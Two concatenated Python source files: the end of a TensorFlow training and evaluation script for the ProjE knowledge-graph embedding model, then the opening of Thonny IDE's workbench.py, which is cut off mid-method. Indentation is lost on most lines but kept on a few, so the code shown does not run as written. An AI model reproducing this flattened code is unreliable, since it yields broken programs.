return hrt_loss + trh_loss + regularizer_loss * regularizer_weight
def test(self, inputs, scope=None):
with tf.variable_scope(scope or type(self).__name__) as scp:
scp.reuse_variables()
h = tf.nn.embedding_lookup(self.__ent_embedding, inputs[:, 0])
t = tf.nn.embedding_lookup(self.__ent_embedding, inputs[:, 1])
r = tf.nn.embedding_lookup(self.__rel_embedding, inputs[:, 2])
ent_mat = tf.transpose(self.__ent_embedding)
if self.__combination_method.lower() == 'simple':
# predict tails
hr = h * self.__hr_weighted_vector[:self.__embed_dim] + r * self.__hr_weighted_vector[
self.__embed_dim:]
hrt_res = tf.matmul(tf.tanh(hr + self.__hr_combination_bias), ent_mat)
_, tail_ids = tf.nn.top_k(hrt_res, k=self.__n_entity)
# predict heads
tr = t * self.__tr_weighted_vector[:self.__embed_dim] + r * self.__tr_weighted_vector[self.__embed_dim:]
trh_res = tf.matmul(tf.tanh(tr + self.__tr_combination_bias), ent_mat)
_, head_ids = tf.nn.top_k(trh_res, k=self.__n_entity)
else:
hr = tf.matmul(tf.concat(1, [h, r]), self.__hr_combination_matrix)
hrt_res = (tf.matmul(tf.tanh(hr + self.__hr_combination_bias), ent_mat))
_, tail_ids = tf.nn.top_k(hrt_res, k=self.__n_entity)
tr = tf.matmul(tf.concat(1, [t, r]), self.__tr_combination_matrix)
trh_res = (tf.matmul(tf.tanh(tr + self.__tr_combination_bias), ent_mat))
_, head_ids = tf.nn.top_k(trh_res, k=self.__n_entity)
return head_ids, tail_ids
def train_ops(model: ProjE, learning_rate=0.1, optimizer_str='gradient', regularizer_weight=1.0):
with tf.device('/cpu'):
train_hrt_input = tf.placeholder(tf.int32, [None, 2])
train_hrt_weight = tf.placeholder(tf.float32, [None, model.n_entity])
train_trh_input = tf.placeholder(tf.int32, [None, 2])
train_trh_weight = tf.placeholder(tf.float32, [None, model.n_entity])
loss = model.train([train_hrt_input, train_hrt_weight, train_trh_input, train_trh_weight],
regularizer_weight=regularizer_weight)
if optimizer_str == 'gradient':
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
elif optimizer_str == 'rms':
optimizer = tf.train.RMSPropOptimizer(learning_rate=learning_rate)
elif optimizer_str == 'adam':
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
else:
raise NotImplementedError("Does not support %s optimizer" % optimizer_str)
grads = optimizer.compute_gradients(loss, model.trainable_variables)
op_train = optimizer.apply_gradients(grads)
return train_hrt_input, train_hrt_weight, train_trh_input, train_trh_weight, loss, op_train
def test_ops(model: ProjE):
with tf.device('/cpu'):
test_input = tf.placeholder(tf.int32, [None, 3])
head_ids, tail_ids = model.test(test_input)
return test_input, head_ids, tail_ids
def worker_func(in_queue: JoinableQueue, out_queue: Queue, hr_t, tr_h):
while True:
dat = in_queue.get()
if dat is None:
in_queue.task_done()
continue
testing_data, head_pred, tail_pred = dat
out_queue.put(test_evaluation(testing_data, head_pred, tail_pred, hr_t, tr_h))
in_queue.task_done()
def data_generator_func(in_queue: JoinableQueue, out_queue: Queue, tr_h, hr_t, n_entity, neg_weight):
while True:
dat = in_queue.get()
if dat is None:
break
# [head(tail), relation, #of_total_positive_candidates, positive_instances..., negative_instances...]
hr_tlist = list()
hr_tweight = list()
tr_hlist = list()
tr_hweight = list()
htr = dat
for idx in range(htr.shape[0]):
if np.random.uniform(-1, 1) > 0: # t r predict h
tr_hweight.append(
[1. if x in tr_h[htr[idx, 1]][htr[idx, 2]] else y for
x, y in enumerate(np.random.choice([0., -1.], size=n_entity, p=[1 - neg_weight, neg_weight]))])
tr_hlist.append([htr[idx, 1], htr[idx, 2]])
else: # h r predict t
hr_tweight.append(
[1. if x in hr_t[htr[idx, 0]][htr[idx, 2]] else y for
x, y in enumerate(np.random.choice([0., -1.], size=n_entity, p=[1 - neg_weight, neg_weight]))])
hr_tlist.append([htr[idx, 0], htr[idx, 2]])
out_queue.put((np.asarray(hr_tlist, dtype=np.int32), np.asarray(hr_tweight, dtype=np.float32),
np.asarray(tr_hlist, dtype=np.int32), np.asarray(tr_hweight, dtype=np.float32)))
def test_evaluation(testing_data, head_pred, tail_pred, hr_t, tr_h):
assert len(testing_data) == len(head_pred)
assert len(testing_data) == len(tail_pred)
mean_rank_h = list()
mean_rank_t = list()
filtered_mean_rank_h = list()
filtered_mean_rank_t = list()
for i in range(len(testing_data)):
h = testing_data[i, 0]
t = testing_data[i, 1]
r = testing_data[i, 2]
# mean rank
mr = 0
for val in head_pred[i]:
if val == h:
mean_rank_h.append(mr)
break
mr += 1
mr = 0
        for val in tail_pred[i]:
            if val == t:
                mean_rank_t.append(mr)
                break
            mr += 1
# filtered mean rank
fmr = 0
for val in head_pred[i]:
if val == h:
filtered_mean_rank_h.append(fmr)
break
if t in tr_h and r in tr_h[t] and val in tr_h[t][r]:
continue
else:
fmr += 1
fmr = 0
for val in tail_pred[i]:
if val == t:
filtered_mean_rank_t.append(fmr)
break
if h in hr_t and r in hr_t[h] and val in hr_t[h][r]:
continue
else:
fmr += 1
return (mean_rank_h, filtered_mean_rank_h), (mean_rank_t, filtered_mean_rank_t)
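# Worked example (illustrative): suppose head_pred[i] = [e3, e7, h, ...] for the test
# triple (h, t, r), and e7 (but not e3) is already a known head for (t, r) in tr_h. The
# raw rank of h is then 2, since two candidates precede it, while the filtered rank is 1,
# because the known-true candidate e7 is skipped rather than counted against the prediction.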
def main(_):
parser = argparse.ArgumentParser(description='ProjE.')
parser.add_argument('--data', dest='data_dir', type=str, help="Data folder", default='./data/FB15k/')
parser.add_argument('--lr', dest='lr', type=float, help="Learning rate", default=0.01)
parser.add_argument("--dim", dest='dim', type=int, help="Embedding dimension", default=200)
parser.add_argument("--batch", dest='batch', type=int, help="Batch size", default=100)
parser.add_argument("--comb", dest="combination_method", type=str, help="Combination method", default='simple')
parser.add_argument("--worker", dest='n_worker', type=int, help="Evaluation worker", default=3)
parser.add_argument("--generator", dest='n_generator', type=int, help="Data generator", default=10)
parser.add_argument("--eval_batch", dest="eval_batch", type=int, help="Evaluation batch size", default=500)
parser.add_argument("--save_dir", dest='save_dir', type=str, help="Model path", default='./')
parser.add_argument("--load_model", dest='load_model', type=str, help="Model file", default="")
parser.add_argument("--save_per", dest='save_per', type=int, help="Save per x iteration", default=10)
parser.add_argument("--eval_per", dest='eval_per', type=int, help="Evaluate every x iteration", default=1)
parser.add_argument("--max_iter", dest='max_iter', type=int, help="Max iteration", default=100)
parser.add_argument("--summary_dir", dest='summary_dir', type=str, help="summary directory",
default='./ProjE_summary/')
parser.add_argument("--keep", dest='drop_out', type=float, help="Keep prob (1.0 keep all, 0. drop all)",
default=0.5)
parser.add_argument("--optimizer", dest='optimizer', type=str, help="Optimizer", default='adam')
parser.add_argument("--prefix", dest='prefix', type=str, help="model_prefix", default='DEFAULT')
parser.add_argument("--loss_weight", dest='loss_weight', type=float, help="Weight on parameter loss", default=1e-5)
parser.add_argument("--neg_weight", dest='neg_weight', type=float, help="Sampling weight on negative examples",
default=0.5)
args = parser.parse_args()
print(args)
model = ProjE(args.data_dir, embed_dim=args.dim, combination_method=args.combination_method,
dropout=args.drop_out, neg_weight=args.neg_weight)
train_hrt_input, train_hrt_weight, train_trh_input, train_trh_weight, \
train_loss, train_op = train_ops(model, learning_rate=args.lr,
optimizer_str=args.optimizer,
regularizer_weight=args.loss_weight)
test_input, test_head, test_tail = test_ops(model)
with tf.Session() as session:
tf.initialize_all_variables().run()
saver = tf.train.Saver()
iter_offset = 0
        if args.load_model and os.path.exists(args.load_model):
saver.restore(session, args.load_model)
iter_offset = int(args.load_model.split('.')[-2].split('_')[-1]) + 1
print("Load model from %s, iteration %d restored." % (args.load_model, iter_offset))
total_inst = model.n_train
# training data generator
raw_training_data_queue = Queue()
training_data_queue = Queue()
data_generators = list()
for i in range(args.n_generator):
data_generators.append(Process(target=data_generator_func, args=(
raw_training_data_queue, training_data_queue, model.tr_h, model.hr_t, model.n_entity, args.neg_weight)))
data_generators[-1].start()
evaluation_queue = JoinableQueue()
result_queue = Queue()
for i in range(args.n_worker):
worker = Process(target=worker_func, args=(evaluation_queue, result_queue, model.hr_t, model.tr_h))
worker.start()
for data_func, test_type in zip([model.validation_data, model.testing_data], ['VALID', 'TEST']):
accu_mean_rank_h = list()
accu_mean_rank_t = list()
accu_filtered_mean_rank_h = list()
accu_filtered_mean_rank_t = list()
evaluation_count = 0
for testing_data in data_func(batch_size=args.eval_batch):
head_pred, tail_pred = session.run([test_head, test_tail],
{test_input: testing_data})
evaluation_queue.put((testing_data, head_pred, tail_pred))
evaluation_count += 1
for i in range(args.n_worker):
evaluation_queue.put(None)
print("waiting for worker finishes their work")
evaluation_queue.join()
print("all worker stopped.")
while evaluation_count > 0:
evaluation_count -= 1
(mrh, fmrh), (mrt, fmrt) = result_queue.get()
accu_mean_rank_h += mrh
accu_mean_rank_t += mrt
accu_filtered_mean_rank_h += fmrh
accu_filtered_mean_rank_t += fmrt
print(
"[%s] INITIALIZATION [HEAD PREDICTION] MEAN RANK: %.1f FILTERED MEAN RANK %.1f HIT@10 %.3f FILTERED HIT@10 %.3f" %
(test_type, np.mean(accu_mean_rank_h), np.mean(accu_filtered_mean_rank_h),
np.mean(np.asarray(accu_mean_rank_h, dtype=np.int32) < 10),
np.mean(np.asarray(accu_filtered_mean_rank_h, dtype=np.int32) < 10)))
print(
"[%s] INITIALIZATION [TAIL PREDICTION] MEAN RANK: %.1f FILTERED MEAN RANK %.1f HIT@10 %.3f FILTERED HIT@10 %.3f" %
(test_type, np.mean(accu_mean_rank_t), np.mean(accu_filtered_mean_rank_t),
np.mean(np.asarray(accu_mean_rank_t, dtype=np.int32) < 10),
np.mean(np.asarray(accu_filtered_mean_rank_t, dtype=np.int32) < 10)))
for n_iter in range(iter_offset, args.max_iter):
start_time = timeit.default_timer()
accu_loss = 0.
accu_re_loss = 0.
ninst = 0
print("initializing raw training data...")
nbatches_count = 0
for dat in model.raw_training_data(batch_size=args.batch):
raw_training_data_queue.put(dat)
nbatches_count += 1
print("raw training data initialized.")
while nbatches_count > 0:
nbatches_count -= 1
hr_tlist, hr_tweight, tr_hlist, tr_hweight = training_data_queue.get()
l, rl, _ = session.run(
[train_loss, model.regularizer_loss, train_op], {train_hrt_input: hr_tlist,
train_hrt_weight: hr_tweight,
train_trh_input: tr_hlist,
train_trh_weight: tr_hweight})
accu_loss += l
accu_re_loss += rl
ninst += len(hr_tlist) + len(tr_hlist)
                # progress for every batch, printed in place (overwritten via end='\r')
                print(
                    '[%d sec](%d/%d) : %.2f -- loss : %.5f rloss: %.5f ' % (
                        timeit.default_timer() - start_time, ninst, total_inst, float(ninst) / total_inst,
                        l / (len(hr_tlist) + len(tr_hlist)),
                        args.loss_weight * (rl / (len(hr_tlist) + len(tr_hlist)))),
                    end='\r')
print("")
print("iter %d avg loss %.5f, time %.3f" % (n_iter, accu_loss / ninst, timeit.default_timer() - start_time))
if n_iter % args.save_per == 0 or n_iter == args.max_iter - 1:
save_path = saver.save(session,
os.path.join(args.save_dir,
"ProjE_" + str(args.prefix) + "_" + str(n_iter) + ".ckpt"))
print("Model saved at %s" % save_path)
if n_iter % args.eval_per == 0 or n_iter == args.max_iter - 1:
for data_func, test_type in zip([model.validation_data, model.testing_data], ['VALID', 'TEST']):
accu_mean_rank_h = list()
accu_mean_rank_t = list()
accu_filtered_mean_rank_h = list()
accu_filtered_mean_rank_t = list()
evaluation_count = 0
for testing_data in data_func(batch_size=args.eval_batch):
head_pred, tail_pred = session.run([test_head, test_tail],
{test_input: testing_data})
evaluation_queue.put((testing_data, head_pred, tail_pred))
evaluation_count += 1
for i in range(args.n_worker):
evaluation_queue.put(None)
print("waiting for worker finishes their work")
evaluation_queue.join()
print("all worker stopped.")
while evaluation_count > 0:
evaluation_count -= 1
(mrh, fmrh), (mrt, fmrt) = result_queue.get()
accu_mean_rank_h += mrh
accu_mean_rank_t += mrt
accu_filtered_mean_rank_h += fmrh
accu_filtered_mean_rank_t += fmrt
print(
"[%s] ITER %d [HEAD PREDICTION] MEAN RANK: %.1f FILTERED MEAN RANK %.1f HIT@10 %.3f FILTERED HIT@10 %.3f" %
(test_type, n_iter, np.mean(accu_mean_rank_h), np.mean(accu_filtered_mean_rank_h),
np.mean(np.asarray(accu_mean_rank_h, dtype=np.int32) < 10),
np.mean(np.asarray(accu_filtered_mean_rank_h, dtype=np.int32) < 10)))
print(
"[%s] ITER %d [TAIL PREDICTION] MEAN RANK: %.1f FILTERED MEAN RANK %.1f HIT@10 %.3f FILTERED HIT@10 %.3f" %
(test_type, n_iter, np.mean(accu_mean_rank_t), np.mean(accu_filtered_mean_rank_t),
np.mean(np.asarray(accu_mean_rank_t, dtype=np.int32) < 10),
np.mean(np.asarray(accu_filtered_mean_rank_t, dtype=np.int32) < 10)))
if __name__ == '__main__':
tf.app.run()
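# Example invocation (illustrative only; the actual script/module name and dataset layout
# depend on how this file is packaged -- only the flags below are defined by the parser above):
#
#   python ProjE.py --data ./data/FB15k/ --dim 200 --batch 100 --max_iter 100 \
#       --worker 3 --generator 10 --eval_per 1 --save_dir ./checkpoints/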
|
workbench.py
|
# -*- coding: utf-8 -*-
import ast
import collections
import importlib
import logging
import os.path
import pkgutil
import platform
import queue
import re
import socket
import sys
import tkinter as tk
import tkinter.font as tk_font
import traceback
from threading import Thread
from tkinter import messagebox, ttk
from typing import Any, Callable, Dict, List, Optional, Sequence, Set, Tuple, Type, Union, cast
from warnings import warn
import thonny
from thonny import (
THONNY_USER_DIR,
assistance,
get_runner,
get_shell,
is_portable,
languages,
running,
ui_utils,
)
from thonny.common import Record, UserError, normpath_with_actual_case
from thonny.config import try_load_configuration
from thonny.config_ui import ConfigurationDialog
from thonny.editors import EditorNotebook
from thonny.languages import tr
from thonny.misc_utils import (
copy_to_clipboard,
running_on_linux,
running_on_mac_os,
running_on_rpi,
running_on_windows,
)
from thonny.plugins.microbit import MicrobitFlashingDialog
from thonny.plugins.micropython.uf2dialog import Uf2FlashingDialog
from thonny.running import BackendProxy, Runner
from thonny.shell import ShellView
from thonny.ui_utils import (
AutomaticNotebook,
AutomaticPanedWindow,
create_tooltip,
get_style_configuration,
lookup_style_option,
register_latin_shortcut,
select_sequence,
sequence_to_accelerator,
)
logger = logging.getLogger(__name__)
SERVER_SUCCESS = "OK"
SIMPLE_MODE_VIEWS = ["ShellView"]
MenuItem = collections.namedtuple("MenuItem", ["group", "position_in_group", "tester"])
BackendSpec = collections.namedtuple(
"BackendSpec", ["name", "proxy_class", "description", "config_page_constructor", "sort_key"]
)
BasicUiThemeSettings = Dict[str, Dict[str, Union[Dict, Sequence]]]
CompoundUiThemeSettings = List[BasicUiThemeSettings]
UiThemeSettings = Union[BasicUiThemeSettings, CompoundUiThemeSettings]
FlexibleUiThemeSettings = Union[UiThemeSettings, Callable[[], UiThemeSettings]]
SyntaxThemeSettings = Dict[str, Dict[str, Union[str, int, bool]]]
FlexibleSyntaxThemeSettings = Union[SyntaxThemeSettings, Callable[[], SyntaxThemeSettings]]
OBSOLETE_PLUGINS = [
"thonnycontrib.pi",
"thonnycontrib.micropython",
"thonnycontrib.circuitpython",
"thonnycontrib.microbit",
"thonnycontrib.esp",
]
class Workbench(tk.Tk):
"""
Thonny's main window and communication hub.
Is responsible for:
* creating the main window
* maintaining layout (_init_containers)
* loading plugins (_init_plugins, add_view, add_command)
* providing references to main components (editor_notebook and runner)
* communication between other components (see event_generate and bind)
* configuration services (get_option, set_option, add_defaults)
* loading translations
* maintaining fonts (named fonts, increasing and decreasing font size)
After workbench and plugins get loaded, 3 kinds of events start happening:
* User events (keypresses, mouse clicks, menu selections, ...)
* Virtual events (mostly via get_workbench().event_generate). These include:
events reported via and dispatched by Tk event system;
WorkbenchEvent-s, reported via and dispatched by enhanced get_workbench().event_generate.
* Events from the background process (program output notifications, input requests,
notifications about debugger's progress)
"""
def __init__(self) -> None:
thonny._workbench = self
self.ready = False
self._closing = False
self._destroyed = False
self._lost_focus = False
self._is_portable = is_portable()
self.initializing = True
self._init_configuration()
self._tweak_environment()
self._check_init_server_loop()
tk.Tk.__init__(self, className="Thonny")
tk.Tk.report_callback_exception = self._on_tk_exception # type: ignore
ui_utils.add_messagebox_parent_checker()
self._event_handlers = {} # type: Dict[str, Set[Callable]]
self._images = (
set()
) # type: Set[tk.PhotoImage] # keep images here to avoid Python garbage collecting them,
self._default_image_mapping = (
{}
        )  # type: Dict[str, str]  # to allow specifying default alternative images
self._image_mapping_by_theme = (
{}
) # type: Dict[str, Dict[str, str]] # theme-based alternative images
self._current_theme_name = "clam" # will be overwritten later
self._backends = {} # type: Dict[str, BackendSpec]
self._commands = [] # type: List[Dict[str, Any]]
self._toolbar_buttons = {}
self._view_records = {} # type: Dict[str, Dict[str, Any]]
self.content_inspector_classes = [] # type: List[Type]
self._latin_shortcuts = {} # type: Dict[Tuple[int,int], List[Tuple[Callable, Callable]]]
self._init_language()
self._active_ui_mode = os.environ.get("THONNY_MODE", self.get_option("general.ui_mode"))
self._init_scaling()
self._init_theming()
self._init_window()
self.option_add("*Dialog.msg.wrapLength", "8i")
self.add_view(
ShellView, tr("Shell"), "s", visible_by_default=True, default_position_key="A"
)
assistance.init()
self._runner = Runner()
self._load_plugins()
self._editor_notebook = None # type: Optional[EditorNotebook]
self._init_fonts()
self.reload_themes()
self._init_menu()
self._init_containers()
assert self._editor_notebook is not None
self._init_program_arguments_frame()
# self._init_backend_switcher()
self._init_regular_mode_link() # TODO:
self._show_views()
# Make sure ShellView is loaded
get_shell()
self._init_commands()
self._init_icon()
try:
self._editor_notebook.load_startup_files()
except Exception:
self.report_exception()
self._editor_notebook.focus_set()
self._try_action(self._open_views)
self.bind_class("CodeViewText", "<<CursorMove>>", self.update_title, True)
self.bind_class("CodeViewText", "<<Modified>>", self.update_title, True)
self.bind_class("CodeViewText", "<<TextChange>>", self.update_title, True)
self.get_editor_notebook().bind("<<NotebookTabChanged>>", self.update_title, True)
self.bind_all("<KeyPress>", self._on_all_key_presses, True)
self.bind("<FocusOut>", self._on_focus_out, True)
self.bind("<FocusIn>", self._on_focus_in, True)
self.bind("BackendRestart", self._on_backend_restart, True)
self._publish_commands()
self.initializing = False
self.event_generate("<<WorkbenchInitialized>>")
self._make_sanity_checks()
if self._is_server():
self._poll_ipc_requests()
"""
for name in sorted(sys.modules):
if (
not name.startswith("_")
and not name.startswith("thonny")
and not name.startswith("tkinter")
):
print(name)
"""
self.after(1, self._start_runner) # Show UI already before waiting for the backend to start
self.after_idle(self.advertise_ready)
def advertise_ready(self):
self.event_generate("WorkbenchReady")
self.ready = True
def _make_sanity_checks(self):
home_dir = os.path.expanduser("~")
bad_home_msg = None
if home_dir == "~":
bad_home_msg = "Can not find your home directory."
elif not os.path.exists(home_dir):
bad_home_msg = "Reported home directory (%s) does not exist." % home_dir
if bad_home_msg:
messagebox.showwarning(
"Problems with home directory",
bad_home_msg + "\nThis may cause problems for Thonny.",
master=self,
)
def _try_action(self, action: Callable) -> None:
try:
action()
except Exception:
self.report_exception()
def _init_configuration(self) -> None:
self._configuration_manager = try_load_configuration(thonny.CONFIGURATION_FILE)
self._configuration_pages = [] # type: List[Tuple[str, str, Type[tk.Widget]]]
self.set_default("general.single_instance", thonny.SINGLE_INSTANCE_DEFAULT)
self.set_default("general.ui_mode", "simple" if running_on_rpi() else "regular")
self.set_default("general.debug_mode", False)
self.set_default("general.disable_notification_sound", False)
self.set_default("general.scaling", "default")
self.set_default("general.language", languages.BASE_LANGUAGE_CODE)
self.set_default("general.font_scaling_mode", "default")
self.set_default("general.environment", [])
self.set_default("file.avoid_zenity", False)
self.set_default("run.working_directory", os.path.expanduser("~"))
self.update_debug_mode()
def _tweak_environment(self):
for entry in self.get_option("general.environment"):
if "=" in entry:
key, val = entry.split("=", maxsplit=1)
os.environ[key] = os.path.expandvars(val)
else:
logger.warning("No '=' in environment entry '%s'", entry)
def update_debug_mode(self):
os.environ["THONNY_DEBUG"] = str(self.get_option("general.debug_mode", False))
thonny.set_logging_level()
def _init_language(self) -> None:
"""Initialize language."""
languages.set_language(self.get_option("general.language"))
def _init_window(self) -> None:
self.title("Thonny")
self.set_default("layout.zoomed", False)
self.set_default("layout.top", 15)
self.set_default("layout.left", 150)
if self.in_simple_mode():
self.set_default("layout.width", 1050)
self.set_default("layout.height", 700)
else:
self.set_default("layout.width", 800)
self.set_default("layout.height", 650)
self.set_default("layout.w_width", 200)
self.set_default("layout.e_width", 200)
self.set_default("layout.s_height", 200)
# I don't actually need saved options for Full screen/maximize view,
# but it's easier to create menu items, if I use configuration manager's variables
self.set_default("view.full_screen", False)
self.set_default("view.maximize_view", False)
# In order to avoid confusion set these settings to False
# even if they were True when Thonny was last run
self.set_option("view.full_screen", False)
self.set_option("view.maximize_view", False)
self.geometry(
"{0}x{1}+{2}+{3}".format(
min(max(self.get_option("layout.width"), 320), self.winfo_screenwidth()),
min(max(self.get_option("layout.height"), 240), self.winfo_screenheight()),
min(max(self.get_option("layout.left"), 0), self.winfo_screenwidth() - 200),
min(max(self.get_option("layout.top"), 0), self.winfo_screenheight() - 200),
)
)
if self.get_option("layout.zoomed"):
ui_utils.set_zoomed(self, True)
self.protocol("WM_DELETE_WINDOW", self._on_close)
self.bind("<Configure>", self._on_configure, True)
def _init_statusbar(self):
self._statusbar = ttk.Frame(self)
def _init_icon(self) -> None:
# Window icons
if running_on_linux() and ui_utils.get_tk_version_info() >= (8, 6):
self.iconphoto(True, self.get_image("thonny.png"))
else:
icon_file = os.path.join(self.get_package_dir(), "res", "thonny.ico")
try:
self.iconbitmap(icon_file, default=icon_file)
except Exception:
try:
# seems to work in mac
self.iconbitmap(icon_file)
except Exception:
pass
def _init_menu(self) -> None:
self.option_add("*tearOff", tk.FALSE)
if lookup_style_option("Menubar", "custom", False):
self._menubar = ui_utils.CustomMenubar(
self
) # type: Union[tk.Menu, ui_utils.CustomMenubar]
if self.get_ui_mode() != "simple":
self._menubar.grid(row=0, sticky="nsew")
else:
opts = get_style_configuration("Menubar")
if "custom" in opts:
del opts["custom"]
self._menubar = tk.Menu(self, **opts)
if self.get_ui_mode() != "simple":
self["menu"] = self._menubar
self._menus = {} # type: Dict[str, tk.Menu]
self._menu_item_specs = (
{}
) # type: Dict[Tuple[str, str], MenuItem] # key is pair (menu_name, command_label)
# create standard menus in correct order
self.get_menu("file", tr("File"))
self.get_menu("edit", tr("Edit"))
self.get_menu("view", tr("View"))
self.get_menu("run", tr("Run"))
self.get_menu("tools", tr("Tools"))
self.get_menu("help", tr("Help"))
def _load_plugins(self) -> None:
# built-in plugins
import thonny.plugins # pylint: disable=redefined-outer-name
self._load_plugins_from_path(thonny.plugins.__path__, "thonny.plugins.") # type: ignore
# 3rd party plugins from namespace package
try:
import thonnycontrib # @UnresolvedImport
except ImportError:
# No 3rd party plugins installed
pass
else:
self._load_plugins_from_path(thonnycontrib.__path__, "thonnycontrib.")
def _load_plugins_from_path(self, path: List[str], prefix: str) -> None:
load_function_name = "load_plugin"
modules = []
for _, module_name, _ in sorted(pkgutil.iter_modules(path, prefix), key=lambda x: x[2]):
if module_name in OBSOLETE_PLUGINS:
logging.debug("Skipping plug-in %s", module_name)
else:
try:
m = importlib.import_module(module_name)
if hasattr(m, load_function_name):
modules.append(m)
except Exception:
logging.exception("Failed loading plugin '" + module_name + "'")
def module_sort_key(m):
return getattr(m, "load_order_key", m.__name__)
for m in sorted(modules, key=module_sort_key):
getattr(m, load_function_name)()
def _init_fonts(self) -> None:
# set up editor and shell fonts
self.set_default("view.io_font_family", "Courier" if running_on_mac_os() else "Courier New")
default_editor_family = "Courier New"
families = tk_font.families()
for family in ["Consolas", "Ubuntu Mono", "Menlo", "DejaVu Sans Mono"]:
if family in families:
default_editor_family = family
break
self.set_default("view.editor_font_family", default_editor_family)
if running_on_mac_os():
self.set_default("view.editor_font_size", 14)
self.set_default("view.io_font_size", 12)
elif self.in_simple_mode():
self.set_default("view.editor_font_size", 12)
self.set_default("view.io_font_size", 12)
else:
self.set_default("view.editor_font_size", 13)
self.set_default("view.io_font_size", 11)
default_font = tk_font.nametofont("TkDefaultFont")
if running_on_linux():
heading_font = tk_font.nametofont("TkHeadingFont")
heading_font.configure(weight="normal")
caption_font = tk_font.nametofont("TkCaptionFont")
caption_font.configure(weight="normal", size=default_font.cget("size"))
small_link_ratio = 0.8 if running_on_windows() else 0.7
self._fonts = [
tk_font.Font(
name="SmallLinkFont",
family=default_font.cget("family"),
size=int(default_font.cget("size") * small_link_ratio),
underline=True,
),
tk_font.Font(name="IOFont", family=self.get_option("view.io_font_family")),
tk_font.Font(
name="BoldIOFont", family=self.get_option("view.io_font_family"), weight="bold"
),
tk_font.Font(
name="UnderlineIOFont",
family=self.get_option("view.io_font_family"),
underline=True,
),
tk_font.Font(
name="ItalicIOFont", family=self.get_option("view.io_font_family"), slant="italic"
),
tk_font.Font(
name="BoldItalicIOFont",
family=self.get_option("view.io_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(name="EditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(name="SmallEditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(
name="BoldEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
),
tk_font.Font(
name="ItalicEditorFont",
family=self.get_option("view.editor_font_family"),
slant="italic",
),
tk_font.Font(
name="BoldItalicEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(
name="TreeviewFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
),
tk_font.Font(
name="BoldTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
weight="bold",
),
tk_font.Font(
name="ItalicTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
slant="italic",
),
tk_font.Font(
name="UnderlineTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
underline=1,
),
]
self.update_fonts()
def _start_runner(self) -> None:
try:
self.update_idletasks() # allow UI to complete
thonny._runner = self._runner
self._runner.start()
self._update_toolbar()
except Exception:
self.report_exception("Error when initializing backend")
def _check_init_server_loop(self) -> None:
"""Socket will listen requests from newer Thonny instances,
which try to delegate opening files to older instance"""
if not self.get_option("general.single_instance") or os.path.exists(
thonny.get_ipc_file_path()
):
self._ipc_requests = None
return
self._ipc_requests = queue.Queue() # type: queue.Queue[bytes]
server_socket, actual_secret = self._create_server_socket()
server_socket.listen(10)
def server_loop():
while True:
logging.debug("Waiting for next client")
(client_socket, _) = server_socket.accept()
try:
data = bytes()
while True:
new_data = client_socket.recv(1024)
if len(new_data) > 0:
data += new_data
else:
break
proposed_secret, args = ast.literal_eval(data.decode("UTF-8"))
if proposed_secret == actual_secret:
self._ipc_requests.put(args)
# respond OK
client_socket.sendall(SERVER_SUCCESS.encode(encoding="utf-8"))
client_socket.shutdown(socket.SHUT_WR)
logging.debug("AFTER NEW REQUEST %s", client_socket)
else:
client_socket.shutdown(socket.SHUT_WR)
raise PermissionError("Wrong secret")
except Exception:
traceback.print_exc()
Thread(target=server_loop, daemon=True).start()
def _create_server_socket(self):
if running_on_windows():
server_socket = socket.socket(socket.AF_INET) # @UndefinedVariable
server_socket.bind(("127.0.0.1", 0))
# advertise the port and secret
port = server_socket.getsockname()[1]
import uuid
secret = str(uuid.uuid4())
with open(thonny.get_ipc_file_path(), "w") as fp:
fp.write(str(port) + "\n")
fp.write(secret + "\n")
else:
server_socket = socket.socket(socket.AF_UNIX) # @UndefinedVariable
server_socket.bind(thonny.get_ipc_file_path())
secret = ""
os.chmod(thonny.get_ipc_file_path(), 0o600)
return server_socket, secret
def _init_commands(self) -> None:
self.add_command(
"exit",
"file",
tr("Exit"),
self._on_close,
default_sequence=select_sequence("<Alt-F4>", "<Command-q>", "<Control-q>"),
extra_sequences=["<Alt-F4>"]
if running_on_linux()
else ["<Control-q>"]
if running_on_windows()
else [],
)
self.add_command("show_options", "tools", tr("Options..."), self.show_options, group=180)
self.createcommand("::tk::mac::ShowPreferences", self.show_options)
self.createcommand("::tk::mac::Quit", self._mac_quit)
self.add_command(
"increase_font_size",
"view",
tr("Increase font size"),
lambda: self._change_font_size(1),
default_sequence=select_sequence("<Control-plus>", "<Command-Shift-plus>"),
extra_sequences=["<Control-KP_Add>"],
group=60,
)
self.add_command(
"decrease_font_size",
"view",
tr("Decrease font size"),
lambda: self._change_font_size(-1),
default_sequence=select_sequence("<Control-minus>", "<Command-minus>"),
extra_sequences=["<Control-KP_Subtract>"],
group=60,
)
self.bind("<Control-MouseWheel>", self._cmd_zoom_with_mouse, True)
self.add_command(
"focus_editor",
"view",
tr("Focus editor"),
self._cmd_focus_editor,
default_sequence=select_sequence("<Alt-e>", "<Command-Alt-e>"),
group=70,
)
self.add_command(
"focus_shell",
"view",
tr("Focus shell"),
self._cmd_focus_shell,
default_sequence=select_sequence("<Alt-s>", "<Command-Alt-s>"),
group=70,
)
if self.get_ui_mode() == "expert":
self.add_command(
"toggle_maximize_view",
"view",
tr("Maximize view"),
self._cmd_toggle_maximize_view,
flag_name="view.maximize_view",
default_sequence=None,
group=80,
)
self.bind_class("TNotebook", "<Double-Button-1>", self._maximize_view, True)
self.bind("<Escape>", self._unmaximize_view, True)
self.add_command(
"toggle_maximize_view",
"view",
tr("Full screen"),
self._cmd_toggle_full_screen,
flag_name="view.full_screen",
default_sequence=select_sequence("<F11>", "<Command-Shift-F>"),
group=80,
)
if self.in_simple_mode():
self.add_command(
"font",
"tools",
tr("Change font size"),
caption=tr("Zoom"),
handler=self._toggle_font_size,
image="zoom",
include_in_toolbar=True,
)
self.add_command(
"quit",
"help",
tr("Exit Thonny"),
self._on_close,
image="quit",
caption=tr("Quit"),
include_in_toolbar=True,
group=101,
)
if thonny.in_debug_mode():
